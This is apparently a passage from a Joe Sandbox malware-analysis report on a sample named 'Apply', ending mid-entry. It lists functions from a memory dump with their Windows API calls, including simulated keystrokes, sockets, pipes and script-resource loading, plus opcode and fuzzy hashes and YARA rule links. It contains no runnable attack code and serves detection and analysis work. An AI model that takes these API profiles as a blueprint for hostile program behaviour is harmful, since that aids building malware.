API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: cf54c0dc2a5aa5974f4934fd8882e770af9ab60f43d0a081eff83b67bdaf8417
Instruction ID: f0f6d4ee56980efbdd2f4e2216ec5463ad5155168791b0ff820487a0d9f0b0be
Opcode Fuzzy Hash: cf54c0dc2a5aa5974f4934fd8882e770af9ab60f43d0a081eff83b67bdaf8417
Instruction Fuzzy Hash: 4471AF35A00259AFCB10EF69C881AAEBBF5FF49314F148469E816EB351DB34ED41CB91

Function 008E858A Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01589248), ref: 008E8623
IsWindowEnabled.USER32(01589248), ref: 008E862F
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 008E870A
SendMessageW.USER32(01589248,000000B0,?,?), ref: 008E873D
IsDlgButtonChecked.USER32(?,?), ref: 008E8775
GetWindowLongW.USER32(01589248,000000EC), ref: 008E8797
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 008E87AF

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 9847be4143963670f84be52cbe4b9cf9932109a6cadd344e1dc6f662079ae76f
Instruction ID: bb95d885e66151bb86d4e97a6812a3ecc074491d7e22806ca100d087f046fa72
Opcode Fuzzy Hash: 9847be4143963670f84be52cbe4b9cf9932109a6cadd344e1dc6f662079ae76f
Instruction Fuzzy Hash: 17714874605284EFEF219F66CC98FAE7BA9FF5A310F140059E849D72A1CB31AD84DB11

Function 008BB5BB Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 008BB5FA
GetKeyboardState.USER32(?), ref: 008BB60F
SetKeyboardState.USER32(?), ref: 008BB670
PostMessageW.USER32(?,00000101,00000010,?), ref: 008BB69E
PostMessageW.USER32(?,00000101,00000011,?), ref: 008BB6BD
PostMessageW.USER32(?,00000101,00000012,?), ref: 008BB6FE
PostMessageW.USER32(?,00000101,0000005B,?), ref: 008BB721

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 3bba52f948ebddf49f7f1282fdc22ad2fb2f92714e5983992c41c755d01d3b9e
Instruction ID: 5419a4cab9493e18c2485172a9e85082b42edfa3ac7e7285916690ab11c8e4ff
Opcode Fuzzy Hash: 3bba52f948ebddf49f7f1282fdc22ad2fb2f92714e5983992c41c755d01d3b9e
Instruction Fuzzy Hash: D851E2A09047D53EFB364228CC45BFABFA9BB06304F088489E1D5C55D2D7D8EC84D751

Function 008BB3DB Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 008BB41A
GetKeyboardState.USER32(?), ref: 008BB42F
SetKeyboardState.USER32(?), ref: 008BB490
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008BB4BC
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008BB4D9
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008BB518
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008BB539

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: c99a490b172d5153496455e72678467eacee30af757983639a435462f85f77a6
Instruction ID: 5f00463f52e92e9fb5eb60d70a1ac1183b5bcef743920ed5f808c252855b17b7
Opcode Fuzzy Hash: c99a490b172d5153496455e72678467eacee30af757983639a435462f85f77a6
Instruction Fuzzy Hash: 1C51D1A09047D57DFB3282248C55BFABEA9FB05300F088489E1D5DAAD3D3D4EC88D755

Function 0088577E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00894667,?,?,?,?,?,?,?,?,00885EF3,?,?,00894667,?,?), ref: 008857C0
__fassign.LIBCMT ref: 0088583B
__fassign.LIBCMT ref: 00885856
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00894667,00000005,00000000,00000000), ref: 0088587C
WriteFile.KERNEL32(?,00894667,00000000,00885EF3,00000000,?,?,?,?,?,?,?,?,?,00885EF3,?), ref: 0088589B
WriteFile.KERNEL32(?,?,00000001,00885EF3,00000000,?,?,?,?,?,?,?,?,?,00885EF3,?), ref: 008858D4

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: d1862239fe01c6947b7012ce3ba85c99e9fb62acb0d5b2cc879f5118fe5e710d
Instruction ID: 4c13541b016b06a4b84b05fbda75b5004e973a32e29d9ee3695789492dca3c90
Opcode Fuzzy Hash: d1862239fe01c6947b7012ce3ba85c99e9fb62acb0d5b2cc879f5118fe5e710d
Instruction Fuzzy Hash: A351AF71A106499FDB10DFA8DC85AEEBBF8FF09310F14412BE955E7291E730AA41CB61

Function 00873070 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0087309B
___except_validate_context_record.LIBVCRUNTIME ref: 008730A3
_ValidateLocalCookies.LIBCMT ref: 00873131
__IsNonwritableInCurrentImage.LIBCMT ref: 0087315C
_ValidateLocalCookies.LIBCMT ref: 008731B1

Strings

csm, xrefs: 00873146

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: fe13af6adca9143fe578969e652633b157d90d42297a27a88ba58c56c12f12f4
Instruction ID: 6b21e32c681a13f24e5d9bbf73bd9794092911f6df246780de421c3c3b96417b
Opcode Fuzzy Hash: fe13af6adca9143fe578969e652633b157d90d42297a27a88ba58c56c12f12f4
Instruction Fuzzy Hash: B9418F34A00219ABCF10DF69C885AAEBBA5FF44324F14C155E81DEB25AD731DB41DBA3

Function 008D183F Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 008D37D5: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 008D3801
Part of subcall function 008D37D5: _wcslen.LIBCMT ref: 008D3822

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008D1899
WSAGetLastError.WSOCK32 ref: 008D18A8
WSAGetLastError.WSOCK32 ref: 008D1950
closesocket.WSOCK32(00000000), ref: 008D1980

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 82c660f230a744d357c7e28d61f47dee68451a97375d3394c52cb72dcca45e84
Instruction ID: edcb9a72cf141d15982e5bffc586fb26ee07cea84b9e820e9ae56b09cd8958ae
Opcode Fuzzy Hash: 82c660f230a744d357c7e28d61f47dee68451a97375d3394c52cb72dcca45e84
Instruction Fuzzy Hash: A341AE31600218BFDB109F28C899BA9BBA9FF45364F14816AFC45DF391D770AD85CBA1

Function 008BD4E5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008BE421: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008BD507,?), ref: 008BE43E

Part of subcall function 008BE421: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008BD507,?), ref: 008BE457

lstrcmpiW.KERNEL32(?,?), ref: 008BD52A
MoveFileW.KERNEL32(?,?), ref: 008BD564
_wcslen.LIBCMT ref: 008BD5EA
_wcslen.LIBCMT ref: 008BD600
SHFileOperationW.SHELL32(?), ref: 008BD646

Strings

\*.*, xrefs: 008BD5D8

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: db386734d6e303e5e6a1224bf3f942215d0873c374c5fa16245540ac04f223db
Instruction ID: 556d56afacb32689901e898d330c75653599a2a4af09177f8c37ec8b876225e9
Opcode Fuzzy Hash: db386734d6e303e5e6a1224bf3f942215d0873c374c5fa16245540ac04f223db
Instruction Fuzzy Hash: 04413271905318AFDF22EBA4C981EDD77B8FF18344F0000E6A549EB251EE34AB88CB51

Function 008E35BB Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 008E35DA
GetWindowLongW.USER32(?,000000F0), ref: 008E360D
GetWindowLongW.USER32(?,000000F0), ref: 008E3642
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 008E3674
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 008E369E
GetWindowLongW.USER32(?,000000F0), ref: 008E36AF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 008E36C9

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: fa0b74250c2bea0ef23ecfafbdcb3fcc2faae5cb5f4852de4d1a349120af3d25
Instruction ID: 37bc4c2e09589b28dbef80adbb34f05fd2d957ed5effe320b4bb6566099aa6ee
Opcode Fuzzy Hash: fa0b74250c2bea0ef23ecfafbdcb3fcc2faae5cb5f4852de4d1a349120af3d25
Instruction Fuzzy Hash: 2F310534604294BFDB218F6ADC88F6537A1FB9A720F1501A4F514DF2B2CB71AD85EB41

Function 008C0BA3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 008C0BC3
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008C0BFF

Strings

nul, xrefs: 008C0C38

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 87cc9595e1f356ce8336871bc0135c8858986d83198a5bb78f2bb95f6c4a092f
Instruction ID: 490f6c63001aaad540f520d726bc7c6dd901ab389c05e0683cc6ec5ecad14fb5
Opcode Fuzzy Hash: 87cc9595e1f356ce8336871bc0135c8858986d83198a5bb78f2bb95f6c4a092f
Instruction Fuzzy Hash: 4F211774500309EBDB208F68D845F9ABBB4FF447A4F204A1DE9A1DB291E770D9508F50

Function 008C0C78 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 008C0C97
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008C0CD2

Strings

nul, xrefs: 008C0D0A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: eec8a52b152e8506417810295e8a3da113e18bde46bd78c853664680319e45bd
Instruction ID: 1951405681b69e00d86de9ee0543388091e21f7d0299ddedb4a10020c0e69ce3
Opcode Fuzzy Hash: eec8a52b152e8506417810295e8a3da113e18bde46bd78c853664680319e45bd
Instruction Fuzzy Hash: 32212875500305DBDB209FA98844F9ABBB8FF557A4F200B1DEAB6DB2D0E670E8408F51

Function 008E486D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008566CB: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00856709
Part of subcall function 008566CB: GetStockObject.GDI32(00000011), ref: 0085671D
Part of subcall function 008566CB: SendMessageW.USER32(00000000,00000030,00000000), ref: 00856727

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008E48D2
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008E48DF
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008E48EA
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008E48F9
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008E4905

Strings

Msctls_Progress32, xrefs: 008E48A3

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: d26dc724763769a395754e2962604971b86c862c3deca070580732246ae963d5
Instruction ID: c510d7ea6ff79524b051aa518157611c2bc22e2ef8e6e67236c1a45cdaa4ed15
Opcode Fuzzy Hash: d26dc724763769a395754e2962604971b86c862c3deca070580732246ae963d5
Instruction Fuzzy Hash: 191190B215021DBEEF119F65CC81EEB7F9DFF09758F014110BA08E6161CA729C629BA4

Function 008C3738 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,008946DA,?,?,00000000,00000000), ref: 008C3748
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008946DA,?,?,00000000,00000000), ref: 008C375F
LoadResource.KERNEL32(?,00000000,?,?,008946DA,?,?,00000000,00000000,?,?,?,?,?,?,00855533), ref: 008C376F
SizeofResource.KERNEL32(?,00000000,?,?,008946DA,?,?,00000000,00000000,?,?,?,?,?,?,00855533), ref: 008C3780
LockResource.KERNEL32(008946DA,?,?,008946DA,?,?,00000000,00000000,?,?,?,?,?,?,00855533,?), ref: 008C378F

Strings

SCRIPT, xrefs: 008C3755

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: e38519b6a020aeff9f9868f7c25598094a5d79d1b400d279599b6fdc2db8491c
Instruction ID: 15010370b97c7d69ef5eb8f755a8ff0c53502ec3cc72c6a9629dde4b4c154156
Opcode Fuzzy Hash: e38519b6a020aeff9f9868f7c25598094a5d79d1b400d279599b6fdc2db8491c
Instruction Fuzzy Hash: 3C118EB1200741BFD7218B65DC88F277BB9FFC5B45F14816CB912DA250DB71ED058620

Function 008BE048 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008BE062
LoadStringW.USER32(00000000), ref: 008BE069
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008BE07F
LoadStringW.USER32(00000000), ref: 008BE086
MessageBoxW.USER32(00000000,?,?,00011010), ref: 008BE0CA

Strings

%s (%d) : ==> %s: %s %s, xrefs: 008BE0A7

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: e909010f50a2911107adac7a2d33cdac96f12a16f77b55db87313041a61c990a
Instruction ID: ff19f84812e7272294bb4693a1368296f37dab8e47289992902c217ed6045454
Opcode Fuzzy Hash: e909010f50a2911107adac7a2d33cdac96f12a16f77b55db87313041a61c990a
Instruction Fuzzy Hash: 830186F690034CBFE720A7A49DC9EE7776CF708304F004591B746E6152EA759E894B71

Function 008C103C Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(01580450,01580450), ref: 008C104C
EnterCriticalSection.KERNEL32(01580430,00000000), ref: 008C105E
TerminateThread.KERNEL32(?,000001F6), ref: 008C106C
WaitForSingleObject.KERNEL32(?,000003E8), ref: 008C107A
CloseHandle.KERNEL32(?), ref: 008C1089
InterlockedExchange.KERNEL32(01580450,000001F6), ref: 008C1099
LeaveCriticalSection.KERNEL32(01580430), ref: 008C10A0

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 049a590dd51a91f39e422ec746918f77ec597be6c1e71b6bb94a7ed46435e867
Instruction ID: 0ed3df0d98d51bb1e6719145713cf2f17434073be26828ea07db43ef95afb220
Opcode Fuzzy Hash: 049a590dd51a91f39e422ec746918f77ec597be6c1e71b6bb94a7ed46435e867
Instruction Fuzzy Hash: 93F01932042B42ABD7525B54EECDBD6BB39FF05302F401025F221998A0CB75E4A9CF90

Function 008D23E7 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 008D2547
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008D2568
WSAGetLastError.WSOCK32 ref: 008D2579
htons.WSOCK32(?,?,?,?,?), ref: 008D2662
inet_ntoa.WSOCK32(?), ref: 008D2613

Part of subcall function 008B40D3: _strlen.LIBCMT ref: 008B40DD

Part of subcall function 008D39AB: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,008CF393), ref: 008D39C7

_strlen.LIBCMT ref: 008D26BC

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 9146be5f6b1873fa9a136688051cb20872038bda4a531fe3bcd904aac4c9c04b
Instruction ID: f2199364209da2b8ea27841c7af0490b18a0e7977f3beb3615c1046afd0996c5
Opcode Fuzzy Hash: 9146be5f6b1873fa9a136688051cb20872038bda4a531fe3bcd904aac4c9c04b
Instruction Fuzzy Hash: 33B1D331204340AFC324DF28C895E2A7BA5FFA4318F54865DF45A8B3A2DB71ED45CB92

Function 008563C7 Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 008563ED
GetWindowRect.USER32(?,?), ref: 0085642E
ScreenToClient.USER32(?,?), ref: 00856456
GetClientRect.USER32(?,?), ref: 00856594
GetWindowRect.USER32(?,?), ref: 008565B5

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 24bde9a733830a63bca2674915aea30d5890759112ae0561b11190dc09d5de0b
Instruction ID: 26ce4f1dfc66bb1071d35d0d5ffb8cfe6f0969a0fd2196b17ddb85d829d13991
Opcode Fuzzy Hash: 24bde9a733830a63bca2674915aea30d5890759112ae0561b11190dc09d5de0b
Instruction Fuzzy Hash: 6CB16734A00A4ADBDF14DFA8C4807EAB7F1FF58311F54841AE8AAD7250EB34E964DB54

Function 00880477 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

